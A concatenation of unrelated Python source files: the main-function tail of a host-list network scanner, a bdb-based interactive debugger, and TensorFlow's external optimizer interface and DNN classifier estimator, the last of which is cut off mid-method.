if not args and not opts.input_file and not opts.json_file:
options.print_help()
return
# If any input files were provided, parse through them and add all addresses to "args"
for input_file in opts.input_file:
with open(input_file) as f:
for line in f:
words = line.split()
if not words:
continue
# If input file is in masscan's portscan format
if line.startswith("Discovered open port"):
args.append(words.pop())
elif len(words) == 1:
args.append(words[0])
else:
print "Skipping invalid input line: " % line
continue
if opts.json_file:
try:
import_json(opts.json_file)
except IOError:
print opts.json_file, "not found. Not importing any data"
for host_name, data in host_status.items():
if opts.only_unscanned and 'status' in data:
continue
if data.get('status', None) is True or not opts.only_vulnerable:
args.append(host_name)
# For every network in args, convert it to a netaddr network, so we can iterate through each host
remote_networks = clean_hostlist(args)
for network in remote_networks:
scan_hostlist(network, threads=opts.threads)
if opts.json_file:
export_json(opts.json_file)
print_summary()
if __name__ == '__main__':
signal.signal(signal.SIGINT, signal_handler)
main()
| |
import bdb
import re
import traceback
import sys
import os
import inspect
from contextlib import contextmanager
def line(frame):
return frame.f_lineno
def filename(frame):
return os.path.realpath(frame.f_code.co_filename)
def function_name(frame):
return frame.f_code.co_name or "<unknown>"
def match_range(s):
nm=re.match("(\d+)$",s)
if nm:
nm = int(nm.groups()[0])
return nm,nm+1,1
m = re.match("(\d*)(?::(\d*)(?::(\d+))?)?$",s)
if m:
start,end,step = [(int(n) if n else None) for n in m.groups()]
start,end,step = start or 0, end, step or 1
return start,end,step
return False
def n_in_range(n,ran):
start,end,step = ran
return start <= n and ((not end) or n<end) and (n-start)%step == 0
class MyDB(bdb.Bdb):
breakpoints = {}
def user_call(self, frame, args):
"""This method is called when there is the remote possibility
that we ever need to stop in this function."""
if self._wait_for_mainpyfile:
return
print("--call--",function_name(frame), args)
self.stack, self.curidx = self.get_stack(frame, None)
if self.stop_here(frame):
self.wait_cmd(frame)
def user_line(self, frame):
if self._wait_for_mainpyfile:
if (self.mainpyfile != filename(frame) or frame.f_lineno<= 0):
return
self._wait_for_mainpyfile = False
print ("--line--")
print( "break at", filename(frame), line(frame), "in", function_name(frame))
self.stack, self.curidx = self.get_stack(frame, None)
self.wait_cmd(frame) # continue to next breakpoint
def user_return(self, frame, value):
if self._wait_for_mainpyfile:
return
print ("--return--")
print ("return from", function_name(frame), value)
self.stack, self.curidx = self.get_stack(frame, None)
self.wait_cmd(frame) # continue
def user_exception(self, frame, exception):
if self._wait_for_mainpyfile:
return
print("--exception--")
print("exception in", function_name(frame), exception)
self.stack, self.curidx = self.get_stack(frame, exception[2])
self.wait_cmd(frame) # continue
def wait_cmd(self,frame):
self.curframe = frame
ls={k:repr(v) for k,v in self.filter_vars(frame.f_locals).items()}
gs={k:repr(v) for k,v in self.filter_vars(frame.f_globals).items()}
import __main__
self.main_debug = __main__.__dict__.copy()
with self.exit__main__(self.main_copy):
cmd = self.parent.E_get_cmd(line(frame),ls,gs, filename(frame))
cmd = cmd or (self.last_cmd if hasattr(self, 'last_cmd') else '')
self.last_cmd = cmd
cmdl = (cmd.split() or [''])
s,args = cmdl[0], cmdl[1:]
if s in ['c']: self.set_continue()
elif s in ['n']: self.set_next(frame)
elif s in ['b']:
f, l = self.mainpyfile, int(args[0])
if len(args)>1:
mr = match_range(args[1])
if args[1] == "c":
self.parent.E_clear_break(f,l)
self .clear_break(f,l)
elif mr:
self.parent.E_clear_break(f,l)
self .clear_break(f,l)
self.parent.E_set_break(f,l,{"range": mr, "hits" : 0})
self .set_break(f,l,{"range": mr, "hits" : 0})
else :
self.parent.E_clear_break(f,l)
self .clear_break(f,l)
self.parent.E_set_break(f,l,{"cond":args[1]})
self .set_break(f,l,{"cond":args[1]})
else:
self.parent.E_clear_break(f,l)
self .clear_break(f,l)
self.parent.E_set_break(f,l,{})
self .set_break(f,l,{})
# self.parent.E_toggle_break(f,l)
# self.toggle_break(f,l)
self.wait_cmd(frame)
elif s in ['s']: self.set_step()
elif s in ['q']: self.set_quit()
elif s in ['r']: self.set_return(frame)
elif s in ['u']: self.set_until(frame, int(args[0]) if args else None)
elif s in ['o']:
self.curidx = self.curidx-1
self.wait_cmd(self.stack[self.curidx][0])
elif s in ['i']:
self.curidx = self.curidx+1
self.wait_cmd(self.stack[self.curidx][0])
elif s in ['h']:
self.show_help()
self.wait_cmd(frame)
else : self.wait_cmd(frame)
def show_help(self):
self.parent.E_show_help("""
Commands Description
c Continue execution, only stop when a breakpoint is encountered.
n Continue execution until the next line in the current function is reached or
it returns.
b LINE[ COND|RANGE|c] Set break at LINE in the current file. If a COND expression is supplied, the
debugger stops at LINE only when COND evaluates to True. If a RANGE
expression (a expression matching the syntax of Python slices) is supplied,
the debugger stops at LINE only when the hit count of the breakpoint is one
of the numbers generated by RANGE. If letter c appears after LINE, the
breakpoint is cleared.
s Execute the current line, stop at the first possible occasion (either in a
function that is called or in the current function).
q Quit the debugger.
r Continue execution until the current function returns.
u [LINE] Without argument, continue execution until the line with a number greater
than the current one is reached. With a line number, continue execution
until a line with a number greater or equal than LINE is reached. In both
cases, also stop when the current frame returns.
o Move the current frame one level up in the stack trace (to an older frame).
i Move the current frame one level down in the stack trace (to a newer frame).
h Show this help.
If no command is given, the previous command is repeated.
""")
def runscript(self,filename):
# The script has to run in __main__ namespace (or imports from
# __main__ will break).
#
# So we clear up the __main__ and set several special variables
# (this gets rid of pdb's globals and cleans old variables on restarts).
import __main__
__main__.__dict__
self.main_copy = __main__.__dict__.copy()
self.main_debug= { "__name__" : "__main__",
"__file__" : filename,
"__builtins__": __builtins__,
}
__main__.__dict__.clear()
__main__.__dict__.update(self.main_debug)
# When bdb sets tracing, a number of call and line events happens
# BEFORE debugger even reaches user's code (and the exact sequence of
# events depends on python version). So we take special measures to
# avoid stopping before we reach the main script (see user_line and
# user_call for details).
self.mainpyfile = os.path.realpath(filename)
self._user_requested_quit = False
with open(filename, "rb") as fp:
statement = "exec(compile(%r, %r, 'exec'))" % \
(fp.read(), self.mainpyfile)
self.clear_all_breaks()
for filenam,lines in self.breakpoints.items():
for l,bpinfo in lines.items():
self.set_break(filenam, l,bpinfo)
# Replace pdb's dir with script's dir in front of module search path.
sys.path[0] = os.path.dirname(self.mainpyfile)
try :
self._wait_for_mainpyfile = True
self.run(statement)
except SyntaxError:
print ("SyntaxError")
traceback.print_exc()
self.parent.E_show_exception("syntax error")
except:
traceback.print_exc()
print ("Uncaught exception. Entering post mortem debugging")
typ, val, t = sys.exc_info()
self.parent.E_show_exception(str(val))
self.stack, self.curidx = self.get_stack(None, t)
self.wait_cmd(self.stack[self.curidx][0])
for filenam,lines in self.breakpoints.items():
for l,bpinfo in lines.items():
if "hits" in bpinfo:
bpinfo["hits"]=0
self.parent.E_finished()
__main__.__dict__.clear()
__main__.__dict__.update(self.main_copy)
@contextmanager
def exit__main__(self, main_dict):
import __main__
cur_dict = __main__.__dict__.copy()
__main__.__dict__.clear()
__main__.__dict__.update(main_dict)
try:
yield
except Exception as e:
raise e
finally:
__main__.__dict__.clear()
__main__.__dict__.update(cur_dict)
def tryeval(self,expr):
try:
with self.exit__main__(self.main_debug):
ret = repr(eval(expr, self.curframe.f_globals, self.curframe.f_locals))
return ret
except Exception as e:
return repr(e)
def toggle_break(self,filename,line):
if not filename in self.breakpoints: self.breakpoints.update({filename:{}})
bps = self.breakpoints[filename]
bps.pop(line) if line in bps else bps.update({line:{}})
(self.set_break if line in bps else self.clear_break)(filename, line)
def break_here(self,frame):
if not bdb.Bdb.break_here(self,frame): return False
f, l = filename(frame), line(frame)
bp = self.breakpoints[f][l]
if not "range" in bp: return True
bp["hits"] += 1
return n_in_range(bp["hits"]-1,bp['range'])
def set_break(self,filename,line,bpinfo={},**kwargs):
bdb.Bdb.set_break(self,filename,line,**(bpinfo if "cond" in bpinfo else {}))
if not filename in self.breakpoints: self.breakpoints.update({filename:{}})
bps = self.breakpoints[filename]
if not line in bps: bps.update({line:{}})
bps[line]=bpinfo
def clear_break(self,filename,line):
bdb.Bdb.clear_break(self,filename,line)
if not filename in self.breakpoints: self.breakpoints.update({filename:{}})
bps = self.breakpoints[filename]
if line in bps: bps.pop(line)
def filter_vars(self, d):
# try:
# d.pop("__builtins__") # this messes up things (not eval defined): copy d first
# except:
# pass
return d
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorFlow interface for third-party optimizers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradients
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
__all__ = ['ExternalOptimizerInterface', 'ScipyOptimizerInterface']
class ExternalOptimizerInterface(object):
"""Base class for interfaces with external optimization algorithms.
Subclass this and implement `_minimize` in order to wrap a new optimization
algorithm.
`ExternalOptimizerInterface` should not be instantiated directly; instead use
e.g. `ScipyOptimizerInterface`.
@@__init__
@@minimize
"""
def __init__(self, loss, var_list=None, equalities=None, inequalities=None,
**optimizer_kwargs):
"""Initialize a new interface instance.
Args:
loss: A scalar `Tensor` to be minimized.
var_list: Optional list of `Variable` objects to update to minimize
`loss`. Defaults to the list of variables collected in the graph
under the key `GraphKeys.TRAINABLE_VARIABLES`.
equalities: Optional list of equality constraint scalar `Tensor`s to be
held equal to zero.
inequalities: Optional list of inequality constraint scalar `Tensor`s
to be kept nonnegative.
**optimizer_kwargs: Other subclass-specific keyword arguments.
"""
self._loss = loss
self._equalities = equalities or []
self._inequalities = inequalities or []
if var_list is None:
self._vars = variables.trainable_variables()
else:
self._vars = list(var_list)
self._update_placeholders = [array_ops.placeholder(var.dtype)
for var in self._vars]
self._var_updates = [var.assign(array_ops.reshape(placeholder,
_get_shape_tuple(var)))
for var, placeholder in
zip(self._vars, self._update_placeholders)]
loss_grads = _compute_gradients(loss, self._vars)
equalities_grads = [_compute_gradients(equality, self._vars)
for equality in self._equalities]
inequalities_grads = [_compute_gradients(inequality, self._vars)
for inequality in self._inequalities]
self.optimizer_kwargs = optimizer_kwargs
self._packed_var = self._pack(self._vars)
self._packed_loss_grad = self._pack(loss_grads)
self._packed_equality_grads = [
self._pack(equality_grads)
for equality_grads in equalities_grads
]
self._packed_inequality_grads = [
self._pack(inequality_grads)
for inequality_grads in inequalities_grads
]
dims = [_prod(_get_shape_tuple(var)) for var in self._vars]
accumulated_dims = list(_accumulate(dims))
self._packing_slices = [
slice(start, end) for start, end in zip(accumulated_dims[:-1],
accumulated_dims[1:])]
def minimize(self, session=None, feed_dict=None, fetches=None,
step_callback=None, loss_callback=None, grad_callback=None):
"""Minimize a scalar `Tensor`.
Variables subject to optimization are updated in-place at the end of
optimization.
Note that this method does *not* just return a minimization `Op`, unlike
`Optimizer.minimize()`; instead it actually performs minimization by
executing commands to control a `Session`.
Args:
session: A `Session` instance.
feed_dict: A feed dict to be passed to calls to `session.run`.
fetches: A list of `Tensor`s to fetch and supply to `loss_callback` and
`grad_callback` as positional arguments.
step_callback: A function to be called at each optimization step;
arguments are the current values of all optimization variables
flattened into a single vector.
loss_callback: A function to be called every time the loss and gradients
are computed, with evaluated fetches supplied as positional arguments.
grad_callback: Deprecated.
"""
session = session or ops.get_default_session()
feed_dict = feed_dict or {}
fetches = fetches or []
loss_callback = loss_callback or (lambda *fetches: None)
step_callback = step_callback or (lambda xk: None)
# TODO(chapelle): Remove grad_callback (b/30590858)
if grad_callback:
logging.warn('grad_callback is deprecated. Please use loss_callback.')
# Construct loss function and associated gradient.
loss_grad_func = self._make_eval_func(
[self._loss, self._packed_loss_grad],
session, feed_dict, fetches, loss_callback)
# Construct equality constraint functions and associated gradients.
equality_funcs = self._make_eval_funcs(
self._equalities, session, feed_dict, fetches)
equality_grad_funcs = self._make_eval_funcs(
self._packed_equality_grads, session, feed_dict, fetches)
# Construct inequality constraint functions and associated gradients.
inequality_funcs = self._make_eval_funcs(
self._inequalities, session, feed_dict, fetches)
inequality_grad_funcs = self._make_eval_funcs(
self._packed_inequality_grads, session, feed_dict, fetches)
# Get initial value from TF session.
initial_packed_var_val = session.run(self._packed_var)
# Perform minimization.
packed_var_val = self._minimize(
initial_val=initial_packed_var_val, loss_grad_func=loss_grad_func,
equality_funcs=equality_funcs,
equality_grad_funcs=equality_grad_funcs,
inequality_funcs=inequality_funcs,
inequality_grad_funcs=inequality_grad_funcs,
step_callback=step_callback, optimizer_kwargs=self.optimizer_kwargs)
var_vals = [packed_var_val[packing_slice]
for packing_slice in self._packing_slices]
# Set optimization variables to their new values.
session.run(self._var_updates,
feed_dict=dict(zip(self._update_placeholders, var_vals)))
def _minimize(self, initial_val, loss_grad_func, equality_funcs,
equality_grad_funcs, inequality_funcs, inequality_grad_funcs,
step_callback, optimizer_kwargs):
"""Wrapper for a particular optimization algorithm implementation.
It would be appropriate for a subclass implementation of this method to
raise `NotImplementedError` if unsupported arguments are passed: e.g. if an
algorithm does not support constraints but `len(equality_funcs) > 0`.
Args:
initial_val: A NumPy vector of initial values.
loss_grad_func: A function accepting a NumPy packed variable vector and
returning two outputs, a loss value and the gradient of that loss with
respect to the packed variable vector.
equality_funcs: A list of functions each of which specifies a scalar
quantity that an optimizer should hold exactly zero.
equality_grad_funcs: A list of gradients of equality_funcs.
inequality_funcs: A list of functions each of which specifies a scalar
quantity that an optimizer should hold >= 0.
inequality_grad_funcs: A list of gradients of inequality_funcs.
step_callback: A callback function to execute at each optimization step,
supplied with the current value of the packed variable vector.
optimizer_kwargs: Other key-value arguments available to the optimizer.
Returns:
The optimal variable vector as a NumPy vector.
"""
raise NotImplementedError(
'To use ExternalOptimizerInterface, subclass from it and implement '
'the _minimize() method.')
@classmethod
def _pack(cls, tensors):
"""Pack a list of `Tensor`s into a single, flattened, rank-1 `Tensor`."""
if not tensors:
return None
elif len(tensors) == 1:
return array_ops.reshape(tensors[0], [-1])
else:
flattened = [array_ops.reshape(tensor, [-1]) for tensor in tensors]
return array_ops.concat(0, flattened)
def _make_eval_func(self, tensors, session, feed_dict, fetches,
callback=None):
"""Construct a function that evaluates a `Tensor` or list of `Tensor`s."""
if not isinstance(tensors, list):
tensors = [tensors]
num_tensors = len(tensors)
def eval_func(x):
"""Function to evaluate a `Tensor`."""
augmented_feed_dict = {
var: x[packing_slice].reshape(_get_shape_tuple(var))
for var, packing_slice in zip(self._vars, self._packing_slices)
}
augmented_feed_dict.update(feed_dict)
augmented_fetches = tensors + fetches
augmented_fetch_vals = session.run(
augmented_fetches, feed_dict=augmented_feed_dict)
if callable(callback):
callback(*augmented_fetch_vals[num_tensors:])
return augmented_fetch_vals[:num_tensors]
return eval_func
def _make_eval_funcs(self, tensors, session, feed_dict, fetches,
callback=None):
return [
self._make_eval_func(tensor, session, feed_dict, fetches, callback)
for tensor in tensors
]
class ScipyOptimizerInterface(ExternalOptimizerInterface):
"""Wrapper allowing `scipy.optimize.minimize` to operate a `tf.Session`.
Example:
```python
vector = tf.Variable([7., 7.], 'vector')
# Make vector norm as small as possible.
loss = tf.reduce_sum(tf.square(vector))
optimizer = ScipyOptimizerInterface(loss, options={'maxiter': 100})
with tf.Session() as session:
optimizer.minimize(session)
# The value of vector should now be [0., 0.].
```
Example with constraints:
```python
vector = tf.Variable([7., 7.], 'vector')
# Make vector norm as small as possible.
loss = tf.reduce_sum(tf.square(vector))
# Ensure the vector's y component is = 1.
equalities = [vector[1] - 1.]
# Ensure the vector's x component is >= 1.
inequalities = [vector[0] - 1.]
# Our default SciPy optimization algorithm, L-BFGS-B, does not support
# general constraints. Thus we use SLSQP instead.
optimizer = ScipyOptimizerInterface(
loss, equalities=equalities, inequalities=inequalities, method='SLSQP')
with tf.Session() as session:
optimizer.minimize(session)
# The value of vector should now be [1., 1.].
```
"""
_DEFAULT_METHOD = 'L-BFGS-B'
def _minimize(self, initial_val, loss_grad_func, equality_funcs,
equality_grad_funcs, inequality_funcs, inequality_grad_funcs,
step_callback, optimizer_kwargs):
def loss_grad_func_wrapper(x):
# SciPy's L-BFGS-B Fortran implementation requires gradients as doubles.
loss, gradient = loss_grad_func(x)
return loss, gradient.astype('float64')
method = optimizer_kwargs.pop('method', self._DEFAULT_METHOD)
constraints = []
for func, grad_func in zip(equality_funcs, equality_grad_funcs):
constraints.append({'type': 'eq', 'fun': func, 'jac': grad_func})
for func, grad_func in zip(inequality_funcs, inequality_grad_funcs):
constraints.append({'type': 'ineq', 'fun': func, 'jac': grad_func})
minimize_args = [loss_grad_func_wrapper, initial_val]
minimize_kwargs = {
'jac': True,
'callback': step_callback,
'method': method,
'constraints': constraints,
}
minimize_kwargs.update(optimizer_kwargs)
if method == 'SLSQP':
# SLSQP doesn't support step callbacks. Obviate associated warning
# message.
del minimize_kwargs['callback']
import scipy.optimize # pylint: disable=g-import-not-at-top
result = scipy.optimize.minimize(*minimize_args, **minimize_kwargs)
logging.info('Optimization terminated with:\n'
' Message: %s\n'
' Objective function value: %f\n'
' Number of iterations: %d\n'
' Number of functions evaluations: %d',
result.message, result.fun, result.nit, result.nfev)
return result['x']
def _accumulate(list_):
total = 0
yield total
for x in list_:
total += x
yield total
def _get_shape_tuple(tensor):
return tuple(dim.value for dim in tensor.get_shape())
def _prod(array):
prod = 1
for value in array:
prod *= value
return prod
def _compute_gradients(tensor, var_list):
grads = gradients.gradients(tensor, var_list)
# tf.gradients sometimes returns `None` when it should return 0.
return [grad if grad is not None else array_ops.zeros_like(var)
for var, grad in zip(var_list, grads)]
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Deep Neural Network estimators."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
from tensorflow.contrib import layers
from tensorflow.contrib.framework import deprecated
from tensorflow.contrib.framework import deprecated_arg_values
from tensorflow.contrib.framework.python.framework import experimental
from tensorflow.contrib.framework.python.ops import variables as contrib_variables
from tensorflow.contrib.layers.python.layers import optimizers
from tensorflow.contrib.learn.python.learn import evaluable
from tensorflow.contrib.learn.python.learn import metric_spec
from tensorflow.contrib.learn.python.learn import monitors as monitor_lib
from tensorflow.contrib.learn.python.learn import trainable
from tensorflow.contrib.learn.python.learn.estimators import dnn_linear_combined
from tensorflow.contrib.learn.python.learn.estimators import estimator
from tensorflow.contrib.learn.python.learn.estimators import head as head_lib
from tensorflow.contrib.learn.python.learn.estimators import model_fn
from tensorflow.contrib.learn.python.learn.estimators import prediction_key
from tensorflow.contrib.learn.python.learn.utils import export
from tensorflow.python import summary
from tensorflow.python.ops import nn
from tensorflow.python.ops import partitioned_variables
from tensorflow.python.ops import variable_scope
_CENTERED_BIAS_WEIGHT = "centered_bias_weight"
# The default learning rate of 0.05 is a historical artifact of the initial
# implementation, but seems a reasonable choice.
_LEARNING_RATE = 0.05
def _get_feature_dict(features):
if isinstance(features, dict):
return features
return {"": features}
def _get_optimizer(optimizer):
if callable(optimizer):
return optimizer()
else:
return optimizer
def _add_hidden_layer_summary(value, tag):
summary.scalar("%s_fraction_of_zero_values" % tag, nn.zero_fraction(value))
summary.histogram("%s_activation" % tag, value)
def _dnn_model_fn(features, labels, mode, params, config=None):
"""Deep Neural Net model_fn.
Args:
features: `Tensor` or dict of `Tensor` (depends on data passed to `fit`).
labels: `Tensor` of shape [batch_size, 1] or [batch_size] labels of
dtype `int32` or `int64` in the range `[0, n_classes)`.
mode: Defines whether this is training, evaluation or prediction.
See `ModeKeys`.
params: A dict of hyperparameters.
The following hyperparameters are expected:
* head: A `_Head` instance.
* hidden_units: List of hidden units per layer.
* feature_columns: An iterable containing all the feature columns used by
the model.
* optimizer: string, `Optimizer` object, or callable that defines the
optimizer to use for training. If `None`, will use the Adagrad
optimizer with a default learning rate of 0.05.
* activation_fn: Activation function applied to each layer. If `None`,
will use `tf.nn.relu`.
* dropout: When not `None`, the probability we will drop out a given
coordinate.
* gradient_clip_norm: A float > 0. If provided, gradients are
clipped to their global norm with this clipping ratio.
* embedding_lr_multipliers: Optional. A dictionary from
`EmbeddingColumn` to a `float` multiplier. Multiplier will be used to
multiply with learning rate for the embedding variables.
config: `RunConfig` object to configure the runtime settings.
Returns:
predictions: A dict of `Tensor` objects.
loss: A scalar containing the loss of the step.
train_op: The op for training.
"""
head = params["head"]
hidden_units = params["hidden_units"]
feature_columns = params["feature_columns"]
optimizer = params.get("optimizer") or "Adagrad"
activation_fn = params.get("activation_fn")
dropout = params.get("dropout")
gradient_clip_norm = params.get("gradient_clip_norm")
num_ps_replicas = config.num_ps_replicas if config else 0
embedding_lr_multipliers = params.get("embedding_lr_multipliers", {})
features = _get_feature_dict(features)
parent_scope = "dnn"
input_layer_partitioner = (
partitioned_variables.min_max_variable_partitioner(
max_partitions=num_ps_replicas,
min_slice_size=64 << 20))
input_layer_scope = parent_scope + "/input_from_feature_columns"
with variable_scope.variable_scope(
input_layer_scope,
values=list(six.itervalues(features)),
partitioner=input_layer_partitioner) as scope:
net = layers.input_from_feature_columns(
columns_to_tensors=features,
feature_columns=feature_columns,
weight_collections=[parent_scope],
scope=scope)
hidden_layer_partitioner = (
partitioned_variables.min_max_variable_partitioner(
max_partitions=num_ps_replicas))
for layer_id, num_hidden_units in enumerate(hidden_units):
with variable_scope.variable_scope(
parent_scope + "/hiddenlayer_%d" % layer_id,
values=[net],
partitioner=hidden_layer_partitioner) as scope:
net = layers.fully_connected(
net,
num_hidden_units,
activation_fn=activation_fn,
variables_collections=[parent_scope],
scope=scope)
if dropout is not None and mode == model_fn.ModeKeys.TRAIN:
net = layers.dropout(
net,
keep_prob=(1.0 - dropout))
_add_hidden_layer_summary(net, scope.name)
with variable_scope.variable_scope(
parent_scope + "/logits",
values=[net],
partitioner=hidden_layer_partitioner) as scope:
logits = layers.fully_connected(
net,
head.logits_dimension,
activation_fn=None,
variables_collections=[parent_scope],
scope=scope)
_add_hidden_layer_summary(logits, scope.name)
def _train_op_fn(loss):
"""Returns the op to optimize the loss."""
return optimizers.optimize_loss(
loss=loss,
global_step=contrib_variables.get_global_step(),
learning_rate=_LEARNING_RATE,
optimizer=_get_optimizer(optimizer),
gradient_multipliers=(
dnn_linear_combined._extract_embedding_lr_multipliers( # pylint: disable=protected-access
embedding_lr_multipliers, parent_scope, input_layer_scope)),
clip_gradients=gradient_clip_norm,
name=parent_scope,
# Empty summaries to prevent optimizers from logging the training_loss.
summaries=[])
return head.head_ops(features, labels, mode, _train_op_fn, logits)
class DNNClassifier(evaluable.Evaluable, trainable.Trainable):
"""A classifier for TensorFlow DNN models.
Example:
```python
sparse_feature_a = sparse_column_with_hash_bucket(...)
sparse_feature_b = sparse_column_with_hash_bucket(...)
sparse_feature_a_emb = embedding_column(sparse_id_column=sparse_feature_a,
...)
sparse_feature_b_emb = embedding_column(sparse_id_column=sparse_feature_b,
...)
estimator = DNNClassifier(
feature_columns=[sparse_feature_a_emb, sparse_feature_b_emb],
hidden_units=[1024, 512, 256])
# Or estimator using the ProximalAdagradOptimizer optimizer with
# regularization.
estimator = DNNClassifier(
feature_columns=[sparse_feature_a_emb, sparse_feature_b_emb],
hidden_units=[1024, 512, 256],
optimizer=tf.train.ProximalAdagradOptimizer(
learning_rate=0.1,
l1_regularization_strength=0.001
))
# Input builders
def input_fn_train: # returns x, y (where y represents label's class index).
pass
estimator.fit(input_fn=input_fn_train)
def input_fn_eval: # returns x, y (where y represents label's class index).
pass
estimator.evaluate(input_fn=input_fn_eval)
estimator.predict(x=x) # returns predicted labels (i.e. label's class index).
```
Input of `fit` and `evaluate` should have following features,
otherwise there will be a `KeyError`:
* if `weight_column_name` is not `None`, a feature with
`key=weight_column_name` whose value is a `Tensor`.
* for each `column` in `feature_columns`:
- if `column` is a `SparseColumn`, a feature with `key=column.name`
whose `value` is a `SparseTensor`.
- if `column` is a `WeightedSparseColumn`, two features: the first with
`key` the id column name, the second with `key` the weight column name.
Both features' `value` must be a `SparseTensor`.
- if `column` is a `RealValuedColumn`, a feature with `key=column.name`
whose `value` is a `Tensor`.
"""
def __init__(self,
hidden_units,
feature_columns,
model_dir=None,
n_classes=2,
weight_column_name=None,
optimizer=None,
activation_fn=nn.relu,
dropout=None,
gradient_clip_norm=None,
enable_centered_bias=False,
config=None,
feature_engineering_fn=None,
embedding_lr_multipliers=None):
"""Initializes a DNNClassifier instance.
Args:
hidden_units: List of hidden units per layer. All layers are fully
connected. Ex. `[64, 32]` means first layer has 64 nodes and second one
has 32.
feature_columns: An iterable containing all the feature columns used by
the model. All items in the set should be instances of classes derived
from `FeatureColumn`.
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator to
continue training a previously saved model.
n_classes: number of label classes. Default is binary classification.
It must be greater than 1. Note: Class labels are integers representing
the class index (i.e. values from 0 to n_classes-1). For arbitrary
label values (e.g. string labels), convert to class indices first.
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example.
optimizer: An instance of `tf.Optimizer` used to train the model. If
`None`, will use an Adagrad optimizer.
activation_fn: Activation function applied to each layer. If `None`, will
use `tf.nn.relu`.
dropout: When not `None`, the probability we will drop out a given
coordinate.
gradient_clip_norm: A float > 0. If provided, gradients are
clipped to their global norm with this clipping ratio. See
`tf.clip_by_global_norm` for more details.
enable_centered_bias: A bool. If True, estimator will learn a centered
bias variable for each class. Rest of the model structure learns the
residual after centered bias.
config: `RunConfig` object to configure the runtime settings.
feature_engineering_fn: Feature engineering function. Takes features and
labels which are the output of `input_fn` and
returns features and labels which will be fed
into the model.
embedding_lr_multipliers: Optional. A dictionary from `EmbeddingColumn` to
a `float` multiplier. Multiplier will be used to multiply with
learning rate for the embedding variables.
Returns:
A `DNNClassifier` estimator.
Raises:
ValueError: If `n_classes` < 2.
"""
self._hidden_units = hidden_units
self._feature_columns = feature_columns
self._enable_centered_bias = enable_centered_bias
self._estimator = estimator.Estimator(
model_fn=_dnn_model_fn,
model_dir=model_dir,
config=config,
params={
"head":
head_lib._multi_class_head( # pylint: disable=protected-access
n_classes,
weight_column_name=weight_column_name,
enable_centered_bias=enable_centered_bias),
"hidden_units": hidden_units,
"feature_columns": feature_columns,
"optimizer": optimizer,
"activation_fn": activation_fn,
"dropout": dropout,
"gradient_clip_norm": gradient_clip_norm,
"embedding_lr_multipliers": embedding_lr_multipliers,
},
feature_engineering_fn=feature_engineering_fn)
def fit(self, x=None, y=None, input_fn=None, steps=None, batch_size=None,
monitors=None, max_steps=None):
"""See trainable.Trainable. Note: Labels must be integer class indices."""
# TODO(roumposg): Remove when deprecated monitors are removed.
hooks = monitor_lib.replace_monitors_with_hooks(monitors, self)
self._estimator.fit(x=x,
y=y,
input_fn=input_fn,
steps=steps,
batch_size=batch_size,
monitors=hooks,
max_steps=max_steps)
return self
def evaluate(self, x=None, y=None, input_fn=None, feed_fn=None,
batch_size=None, steps=None, metrics=None, name=None,
checkpoint_path=None):
"""See evaluable.Evaluable. Note: Labels must be integer class indices."""
return self._estimator.evaluate(
x=x, y=y, input_fn=input_fn, feed_fn=feed_fn, batch_size=batch_size,
steps=steps, metrics=metrics, name=name,
checkpoint_path=checkpoint_path)
@deprecated_arg_values(
estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS,
as_iterable=False)
def predict(self, x=None, input_fn=None, batch_size=None, as_iterable=True):
"""Returns predicted classes for given features.
Args:
x: features.
input_fn: Input function. If set, x must be None.
batch_size: Override default batch size.
as_iterable: If True, return an iterable which keeps yielding predictions
for each example until inputs are exhausted. Note: The inputs must
terminate if you want the iterable to terminate (e.g. be sure to pass
num_epochs=1 if you are using something like read_batch_features).
Returns:
Numpy array of predicted classes with shape [batch_size] (or an iterable
of predicted classes if as_iterable is True). Each predicted class is
represented by its class index (i.e. integer from 0 to n_classes-1).
"""
key = prediction_key.PredictionKey.CLASSES
preds = self._estimator.predict(x=x, input_fn=input_fn,
batch_size=batch_size, outputs=[key],
as_iterable=as_iterable)
if as_iterable:
return (pred[key] for pred in preds)
return preds[key].reshape(-1)
@deprecated_arg_values(
estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS,
as_iterable=False)
def predict_proba(
self, x=None, input_fn=None, batch_size=None, as_iterable=True):
"""Returns prediction probabilities for given features.
Args:
x: features.
input_fn: Input function. If set, x and y must be None.
batch_size: Override default batch size.
as_iterable: If True, return an iterable which keeps yielding predictions
for each example until inputs are exhausted. Note: The inputs must
terminate if you want the iterable to terminate (e.g. be sure to pass
num_epochs=1 if you are using something like read_batch_features).
Returns:
Numpy array of predicted probabilities with shape [batch_size, n_classes]
(or an iterable of predicted probabilities if as_iterable is True).
"""
key = prediction_key.PredictionKey.PROBABILITIES
preds = self._estimator.predict(x=x, input_fn=input_fn,
batch_size=batch_size,
outputs=[key],
as_iterable=as_iterable)
if as_iterable:
return (pred[key] for pred in preds)
return preds[key]
def _get_predict_ops(self, features):
"""See `Estimator` class."""
# This method exists to support some models that use the legacy interface.
# pylint: disable=protected-access
return self._estimator._get_predict_ops(features)
def get_variable_names(self):
"""Returns list of all variable names in this model.
Returns:
List of names.
"""
return self._estimator.get_variable_names()
def get_variable_value(self, name):
